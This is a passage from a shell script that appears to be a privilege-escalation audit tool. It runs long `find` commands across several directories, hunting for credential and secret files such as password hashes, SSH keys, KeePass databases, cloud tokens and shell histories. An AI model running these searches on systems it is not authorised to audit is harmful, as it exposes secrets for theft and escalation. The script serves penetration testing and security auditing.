\"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_CACHE=`eval_bckgrd "find /.cache -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_CDROM=`eval_bckgrd "find /cdrom -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_ETC=`eval_bckgrd "find /etc -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"*knockd*\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"ssh*config\" -o -name \"config.php\" -o -name \"*.kdbx\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"google-chrome\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_LIB=`eval_bckgrd "find /lib -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_LIB32=`eval_bckgrd "find /lib32 -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_LIB64=`eval_bckgrd "find /lib64 -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_MEDIA=`eval_bckgrd "find /media -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_MNT=`eval_bckgrd "find /mnt -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"sess_*\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name 